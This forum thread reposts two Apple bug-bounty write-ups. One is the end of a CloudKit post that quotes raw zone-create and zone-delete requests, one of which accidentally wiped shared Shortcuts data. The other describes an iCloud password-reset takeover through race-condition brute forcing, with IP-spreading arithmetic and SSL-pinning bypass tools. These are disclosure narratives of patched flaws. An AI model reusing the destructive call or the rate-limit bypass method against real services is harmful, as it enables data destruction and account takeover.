com.apple.shortcut-container. I could now start checking the permissions for the public records. The simplest way to do this was to add a Burp replace rule to replace my own container in any request data, iCloud.com.mycontainer.test, with the Shortcuts container com.apple.shortcuts: When writing stories of how bugs were found, it’s extremely hard to communicate how much time things take, how many attempts were needed to figure things out. And often, the explanation on what actually worked seems really obvious when presented afterwards. I started going through the endpoints from the CloudKit documentation as well as clicking around in the UX from the CloudKit Developer portal. Records in the public scope were not possible to modify or delete. Some of the record types I found in the public scope were indexable, which allowed you to query for them as lists, however, this was all public info anyway. For example, you could use records/query to get all gallery banners: { "query": { "recordType":"GalleryBanner", "sortBy": [] }, "zoneID": { "zoneName":"_defaultZone" } } But that was not an issue, since they were already listed in the app. I looked into subscriptions, which did not really work as expected in the public scope. I looked at the sharing options, but since shortcuts did not use Short GUID sharing, that was not really interesting either. (Z)one more thing… Zones were the last thing I tested. As I mentioned earlier, each scope has zones, and the default zone is called _defaultZone. What is interesting with the Public scope, is that the UX of the CloudKit Developer portal actually tells you that it doesn’t support adding new zones to the Public scope: However, if I made the call to com.apple.shortcuts to list all zones, I could see that they had indeed more zones in the Public scope than just the default one: I could also add new zones: POST /r/v4/user/com.apple.shortcuts/Production/public/zones/modify?team_id=9DCADDBE3F HTTP/1.1 Host: p25-ckdatabasews.icloud.apple.com { "operations": [ { "purge":true, "zone": { "atomic":true, "zoneID": { "zoneName":"test" } }, "operationType":"create" } ] } which responded with: { "zones": [ { "syncToken":"AQAAAAAAAAABf/////////+AfEbbUd5SC7kEWsQavq+k", "atomic":true, "zoneID": { "zoneType":"REGULAR_CUSTOM_ZONE", "zoneName":"test", "ownerRecordName":"_e059f5dc..." } } ] } but I could not see anything bad with it. I could delete my own zones, but that was about it. Those zones would never be used or interacted with by anyone else. The documentation for zones was limited: There were no other calls than create or delete. I could create a zone, but was there really any impact to this? I wasn’t sure. I signed in to the CloudKit Developer portal with my second Apple ID. I then tried to do the same calls to my first user’s container. { "zones" : [ { "zoneID" : { "zoneName" :"_defaultZone", "zoneType" :"DEFAULT_ZONE" }, "reason" :"Cannot delete all records from public default zone", "serverErrorCode" :"BAD_REQUEST" } ] } So deletion failed if I tried with a different user to my own container, as expected. It wasn’t possible to delete any container’s default zone. Could I do a delete call without actually deleting it, but confirming it in any other way? I did not see a way to do that. My assumption was that a deletion attempt would result in the error above. I decided to try deleting the metadata_zone: { "operations": [ { "purge":true, "zone": { "atomic":true, "zoneID": { "zoneType":"REGULAR_CUSTOM_ZONE", "zoneName":"metadata_zone" } }, "operationType":"delete" } ] } It replied with an error: { "zones" : [ { "zoneID" : { "zoneName" :"metadata_zone", "ownerRecordName" :"_2e80...", "zoneType" :"REGULAR_CUSTOM_ZONE" }, "reason" :"User updates to system zones are not allowed", "serverErrorCode" :"NOT_SUPPORTED_BY_ZONE" } ] } This made me sure that the creation of zones wasn’t really an issue. The delete call did not work on existing ones, and there was no impact on being able to create new ones. I also tried the delete call to _defaultZone since I was sure that the error I would see would be the one above: Cannot delete all records from public default zone. At 23 Mar 2021 20:35:46 GMT I made the following call: POST /r/v4/user/com.apple.shortcuts/Production/public/zones/modify?team_id=9DCADDBE3F HTTP/1.1 Host: p25-ckdatabasews.icloud.apple.com { "operations": [ { "purge": true, "zone": { "atomic": true, "zoneID": { "zoneName": "_defaultZone" } }, "operationType": "delete" } ] } it responded with: { "zones" : [ { "zoneID" : { "zoneName" : "_defaultZone", "zoneType" : "DEFAULT_ZONE" }, "deleted" : true } ] } Shit. I did a zones/list again: { "zones" : [ { "zoneID" : { "zoneName" : "_defaultZone", "ownerRecordName" : "_2e805...", "zoneType" : "DEFAULT_ZONE" }, "atomic" : true }, { "zoneID" : { "zoneName" : "metadata_zone", "ownerRecordName" : "_2e805...", "zoneType" : "REGULAR_CUSTOM_ZONE" }, "atomic" : true } ] } Good, it wasn’t really deleted. I realized that I’ve tested it all and I started to continue looking into other things related to Apple Shortcuts. Suddenly one my shared shortcuts gave a 404: But I just shared it? I quit the Shortcuts app and started it again: Shit. I went to one of the websites sharing a bunch of shortcuts and used my phone to test one: All of them were gone. I know realized that the deletion did somehow work, but that the _defaultZone never disappeared. When I tried sharing a new shortcut it also did not work, at least not to begin with, most likely due to the record types also being deleted. At 23 Mar 2021 20:44:00 GMT I wrote the following email to Apple Security: I explained the situation and confirmed I understood the severity. I also explained the steps I took to avoid causing any service interruptions, since I knew that was against the Apple Security Bounty policy. I explained that creation of zones was indeed possible, but that I did not know if that confirmed that I could also delete zones. Another argument why it was hard to find this bug was that the container made by my other Apple developer account wasn’t vulnerable. Also, the error when trying to delete metadata_zone confirmed that there were indeed permission checks in place. The bug seemed to only allow the _defaultZone to be deleted by anyone on Apple-owned CloudKit containers. I decided to use the case of “I am able to create a zone” as an indicator that this bug existed in other containers owned by Apple. This would show Apple the scope of the issue without me causing any more harm. I was already panicking. Apart from com.apple.shortcuts, the list consisted of 30 more containers with the same issue. I still wasn’t sure if creating a new zone in the public scope did actually prove the ability to delete the default zone, but that’s the closest I got to verifying the issue. Also, the other containers might not have been using the public scope at all and I never confirmed the bug on the other scopes. Apple’s first response came early the morning after: Public response I acknowledged the email and started to see on Twitter that this was in fact affecting a lot of people: There were also some suspicions that this was indeed a move by Apple due to a podcast discussion about using the API to fetch Shortcuts data. A podcast called “Connected” had a discussion on the issue and tried to explain what had happened (Between 26:50 to 40:22). One individual was actually 100% correct identifying the minute of my accidental deletion call: Apple’s response Apple was quite silent after the first request to me to stop testing. They did go public and explain to people that the issue was going to be solved: It took a few days for all data to recover. One other individual shared my assumption on why that was: On April 1st Apple gave the following reply: During the hold out period, I followed up their email again clarifying the steps I took to prevent any service interruption, and tried to explain how limited I was to confirm if the deletion call had worked or not. I also asked them if the creation of a zone was a good indicator of the bug. I got back another response clarifying that creation of a zone was indeed a valid non-destructive way to confirm invalid security controls: I then confirmed that I could not do any of the zone modifications anymore. CloudKit Developer portal was later moved to use the API on api.apple-cloudkit.com instead. Conclusion Approaching CloudKit for bugs turned out to be a lot of fun, a bit scary, and a really good example of what a real deep-dive into one technology can result in when hunting bugs. The Apple Security team was incredibly helpful and professional throughout the process of reporting these issues. Even though the last bug caused an incident, I really tried to explain all my steps to prevent that from happening. The Apple Security Bounty program decided to award $12,000, $24,000 and $28,000, respectively, for the bugs mentioned in this post. Source: https://labs.detectify.com/2021/09/13/hacking-cloudkit-how-i-accidentally-deleted-your-apple-shortcuts/
      • 2
      • Upvote
      • Thanks
  23. This article is about how I found a vulnerability on Apple forgot password endpoint that allowed me to takeover an iCloud account. The vulnerability is completely patched by Apple security team and it no longer works. Apple Security Team rewarded me $18,000 USD as a part of their bounty program but I refused to receive it. Please read the article to know why I refused the bounty. After my Instagram account takeover vulnerability, I realized that many other services are vulnerable to race hazard based brute forcing. So I kept reporting the same with the affected service providers like Microsoft, Apple and a few others. Many people mistook this vulnerability as typical brute force attack but it isn’t. Here we are sending multiple concurrent requests to the server to exploit the race condition vulnerability present in the rate limits making it possible to bypass it. Now lets see what I found in Apple. The forgot password option of Apple ID allows us to change our password using 6 digit OTP sent to our mobile number and email address respectively. Once we enter the correct OTP we will be able to change the password. Apple forgot password page prompting to enter mobile number after entering email address For security reasons, apple will prompt us to enter the trusted phone number along with email address to request OTP. So to exploit this vulnerability, we need to know the trusted phone number as well as their email address to request OTP and will have to try all the possibilities of the 6 digit code, that would be around 1 million attempts (10 ^ 6). As for as my testing, the forgot password endpoint had pretty strong rate limits. If we enter more than 5 attempts, our account will be locked for the next few hours, even rotating the IP didn’t help. HTTP POST REQUEST SENT TO FORGOT PASSWORD ENDPOINT AND ITS RESPONSE Then I tried for race hazard based brute forcing by sending simultaneous POST requests to apple server and found a few more limitations. To my surprise, apple have rate limits for concurrent POST requests from single IP address, not just to the forget password endpoint but to the entire apple server. We cannot send more than 6 concurrent POST requests, it will be dropped. It will not just be dropped but our IP address will be blacklisted for future POST requests with 503 error. Oh my god! That is too much 🤯 So I thought they aren’t vulnerable to this type of attack 😔 but still had some hope since these are generic rate limits across the server and not specific to the code validation endpoint. After some testing, I found a few things iforgot.apple.com resolves to 6 IP addresses across the globe – (17.141.5.112, 17.32.194.36, 17.151.240.33, 17.151.240.1, 17.32.194.5, 17.111.105.243). There were two rate limits we have seen above, one is triggered when we send more than 5 requests to forgot password endpoint (http://iforgot.apple.com/password/verify/smscode) and another one is across the apple server when we send more than 6 concurrent POST requests. Both these rate limits are specific to apple server IP which means we can still send requests (with in limits though) to another apple server IP. We can send upto 6 concurrent requests to an apple server IP (by binding iforgot.apple.com to the IP) from single client IP address as per their limits. There are 6 apple IP address resolved as mentioned above. So we can send upto 36 requests across the 6 apple IP address (6 x 6 = 36) from single IP address. Therefore, the attacker would require 28K IP addresses to send up to 1 million requests to successfully verify the 6 digit code. 28k IP addresses looks easy if you use cloud service providers, but here comes the hardest part, apple server has a strange behavior when we try to send POST requests from cloud service providers like AWS, Google cloud, etc. Response for any POST request sent from AWS & Google cloud They reject the POST request with 502 Bad gateway without even checking the request URI or body. I tried changing IPs but all of them returned same response code, which means they have blacklisted the entire ASN of some cloud service providers if am not wrong 🙄 It makes the attack harder for those who rely on reputed cloud services like AWS. I kept trying various providers and finally found a few service providers their network IPs are not blacklisted. Then I tried to send multiple concurrent POST requests from different IP address to verify the bypass. And it worked!!! 🎉🎉🎉 Now I can change the password of any Apple ID with just their trusted phone number 😇 Of course the attack isn’t easy to do, we need to have a proper setup to successfully exploit this vulnerability. First we need to bypass the SMS 6 digit code then 6 digit code received in the email address. Both bypasses are based on same method and environment so we need not change anything while trying the second bypass. Even if the user has two factor authentication enabled, we will still be able to access their account, because 2FA endpoint also shares the rate limit and was vulnerable. The same vulnerability was also present in the password validation endpoint. I reported this information with detailed reproduction steps and a video demonstrating the bypass to Apple security team on July 1st, 2020. Apple security team acknowledged and triaged the issue with in few minutes of report. I didn’t get any updates from Apple after triage so I kept following up for status updates and they said they are working on a fix on Sep 9th, 2020. Again, no updates for next 5 months and then this email came when I asked for status They said they are planning to address the issue in upcoming security update. I was wondering what is taking so long for them to react to a critical vulnerability. I kept retesting the vulnerability to know whether its fixed instead of relying on them. I tested on April 1st, 2021 and realized a patch for the vulnerability was released to production but still there were no updates from Apple. I asked them whether the issue is patched and the response is same as they have no status updates to share. I was patient and waiting for them to update the status. After a month, I wrote them that the issue was patched on April 1st itself and why am not being updated about it, I also told that I wanted to publish the report to my blog. Apple security team asked me whether it is possible to share the draft of the article with them before publishing. That is when things started to go unexpected. After sharing the draft, they denied my claim saying that this vulnerability do not allow to takeover majority of the icloud accounts. Here’s their response As you can see in the email screenshot, their analysis revealed that it only works against iCloud accounts that has not been used in passcode / password protected Apple devices. I argued that even if the device passcode (4 digit or 6 digit) is asked instead of 6 digit code sent to email, it will still share the same rate limits and would be vulnerable to race condition based brute forcing attacks. We will also be able to discover the passcode of the associated Apple device. I also noticed a few changes in their support page regarding forgot password. Link : https://support.apple.com/en-in/HT201487 The above screenshot shows how the page looks now but it wasn’t the same before my report. In October 2020, that page looked like this Link from web archive : http://web.archive.org/web/20201005172245/https://support.apple.com/en-in/HT201487 “In some cases” is prefixed to the paragraph on October 2020, that is exactly after I was told that they are working on a fix in September 2020. It looks like everything was planned, the page was updated to support their claim of only limited users were vulnerable. That page wasn’t updated for years but getting a minor update after my report. It doesn’t look like a coincidence. When I asked about it, they said the updates are made due to changes in iOS 14. What does resetting password using trusted email / phone number has to do with iOS 14 I asked. If that is true, are trusted phone number and email used to reset the password before iOS 14? If that’s the case, my report is applicable to all Apple accounts. I didn’t get any answer from them. I was disappointed and told them that I am going to publish the blog post with all the details without waiting for their approval. Here’s the reply I got from them. They arranged a call with Apple team engineers to explain what they found in their analysis and also to answer any questions I may have. During the call, I asked why it is different from the vulnerability I found. They said that the passcode is not being sent to any server endpoint and is verified in the device itself. I argued that there is no way for a random apple device to know another device’s passcode without contacting Apple server. They said it is true that the data is sent to server but it is verified using a cryptographic operation and they cannot reveal more than that due to security concerns. I asked what if we find out the encryption process through reverse engineering to replicate it and brute force the Apple server with concurrent requests. I didn’t get any definite answer for that question. They concluded that the only way to brute force the passcode is through brute forcing the Apple device which is not possible due to the local system rate limits. I couldn’t accept what Apple engineers said, logically, it should be possible to replicate what Apple device is doing while sending the passcode data to server. I thought to verify it myself to prove them. If what they said is true, passcode validation endpoint should be vulnerable to race condition based brute forcing. After a few hours of testing I found that they have SSL pinning specific to the passcode validation endpoint, so the traffic sent to the server cannot be read by MITM proxy like burp / charles. Thanks to checkra1n and SSL Kill Switch, using their tool I was able to bypass pinning and read the traffic sent to server. I figured out that Apple uses SRP (Secure Remote Password), a PAKE protocol to verify the user knows the right passcode without actually sending it to the server. So what the engineers said is right, they aren’t sending the passcode directly to server. Instead, both server and client do some mathematical calculations using the previously known data to derive at a key (more like diffie-hellman key exchange). Without getting into the specifics of SRP, let me get straight to what is necessary in our context. Apple server has two stored values namely verifier and salt specific to each user created at the time of setting or updating the passcode. Whenever a user initiates a SRP authentication with username and a ephemeral value A, Apple server responds back with the salt of the specific user and a ephemeral value B. Client uses the salt obtained from server to calculate the key prescribed by SRP-6a. Server uses the salt and verifier to calculate the key prescribed by SRP-6a. Finally they both prove to each other that the derived key are same. Read more about the detailed calculations of SRP-6a here. SRP is known to prevent bruteforce attacks as it has user-specific salt and a verifier, so even if someone steals our database, they will still need to perform a CPU intensive bruteforce for each user to discover the password one by one. That gives enough time for the affected vendor to react to it. But, in our case, we don’t have to bruteforce a large number of accounts. Bruteforcing single user is enough to get into their iCloud account as well as finding their passcode. Brute forcing is possible only when you have both salt and verifier specific to the target user. After bypassing the SMS passcode we can easily impersonate as the target user and obtain the salt. But the problem here is verifier. We should either somehow obtain the verifier from server or bypass the rate limit on key verifying endpoint. If the rate limit is bypassed, we can keep on trying different combinations of key obtained using the precomputed values of the passcode until we arrive at the matching key. Obviously, it requires a lot of computation to derive a key of each 4 or 6 digit numeric passcodes (from 0000/000000 to 9999/999999). When we enter the passcode in an iPhone / iPad during password reset, the device initiates SRP authentication by sending the user session token obtained from the successful SMS verification. The server responds back with the salt of the respective user. The passcode and the salt are hashed to then derive the final key which is sent to https://p50-escrowproxy.icloud.com/escrowproxy/api/recover to check whether it matches the key computed (using ephemeral, salt and verifier) on the server. And the POST request sent to verify the key looked like this String tag has all the data mentioned above but are sent in DATA BLOB format. The first thing I wanted to check is rate limit before decoding the values of BLOB. I sent the request 30 times concurrently to check whether the endpoint was vulnerable. To my shock, it wasn’t vulnerable. Out of 30 requests, 29 of them were rejected with internal server error. Rate limiting would be performed in the Apple server itself or in HSM (hardware security module). Either way, the rate limit logic should be programmed as such to prevent race hazard. There is very bleak chance for this endpoint to be not vulnerable to race hazard before my report because all the other endpoints I tested was vulnerable – SMS code validation, email code validation, two factor authentication, password validation was all vulnerable. If they did patch it after my report, the vulnerability became a lot more severe than what I initially thought. Through bruteforcing the passcode, we will be able to identify the correct passcode by differentiating the responses. So we not only can takeover any iCloud account but also discover the passcode of the Apple device associated with it. Even though the attack is complex, this vulnerability could hack any iPhone / iPad that has 4 digit / 6 digit numeric passcode if my assumption is right. Since it is now validating the concurrent requests properly, there is no way for me to verify my claim, the only way I can confirm this is by writing to Apple but they aren’t giving any response in this regard. I got the bounty email from Apple on June 4th, 2021. The actual bounty mentioned for iCloud account takeover in Apple’s website is $100,000 USD. Extracting sensitive data from locked Apple device is $250,000 USD. My report covered both the scenarios (assuming the passcode endpoint was patched after my report), so the actual bounty should be $350,0000. Even if they chose to award the maximum impact out of the two cases, it should still be $250,000 USD. Selling these kind of vulnerabilities to government agencies or private bounty programs like zerodium could have made a lot more money. But I chose the ethical way and I didn’t expect anything more than the outlined bounty amounts by Apple. https://developer.apple.com/security-bounty/payouts/ But $18,000 USD is not even close to the actual bounty. Lets say all my assumptions are wrong and Apple passcode verifying endpoint wasn’t vulnerable before my report. Even then the given bounty is not fair looking at the impact of the vulnerability as given below. Bypassed the two factor authentication. It is literally like 2FA doesn’t exist due to the bypass. People who are all relying on 2FA are vulnerable. This itself is a major vulnerability. Bypassed the password validation rate limits. All the Apple ID accounts that use common / weak / hacked passwords are vulnerable even if they have two factor authentication enabled. Once hacked, the attacker can track the location of the device as well as wipe the device remotely. 2014 celebrities iCloud hack is majorly because of weak passwords. Bypassed the SMS verification. If we know the passcode or password of the device associated with the iCloud account. Lets say any of your friends or relatives knows your device passcode, using this vulnerability, they can takeover your iCloud account and also can erase your entire device remotely over the internet without having physical access to it. We can takeover all Apple IDs that are not associated with a passcode protected Apple device due to both SMS and email verification code bypass, which means Any apple device without passcode or password, like anyone who turned off or didn’t set the passcode / password. Any Apple ID created without apple device, like in browsers or in an android app and not been used in password protected apple devices For example, 50 Million+ android users have downloaded Apple music app. In those, majority of them may not have used Apple devices. They are still Apple users and their information like credit cards, billing address, subscription details, etc could be exposed. They need not reward the upper cap of the iCloud account takeover ($100k) but it should at least be close to it considering the impact it has created. After all my hard work and almost a year of waiting, I didn’t get what I deserved because of Apple’s unfair judgement. So I refused to receive the bounty and told them it is unfair. I asked them to reconsider the bounty decision or let me publish the report with all the information. There wasn’t any response to my emails. So I have decided to publish my article without waiting for their response indefinitely. Therefore, I shared my research with Apple for FREE of cost instead of an unfair price. I request Apple security team to be more transparent and fair at least in the future. I would like to thank Apple for patching the vulnerability. I repeat, the vulnerability is completely fixed and the scenarios described above no longer works. Thank you for reading the article! Please let me know your thoughts in comments. Source: https://thezerohack.com/apple-vulnerability-bug-bounty
  24. Venmo Xoom Braintree Payments Swift Financial/ Loanbuilder Hyperwallet Astea sunt in scop in programul lor de bug bounty.
  25. Sincer, sunt multumit de cat am primit. Fata de altii, ce sa mai spun. 😅
×
×
  • Create New...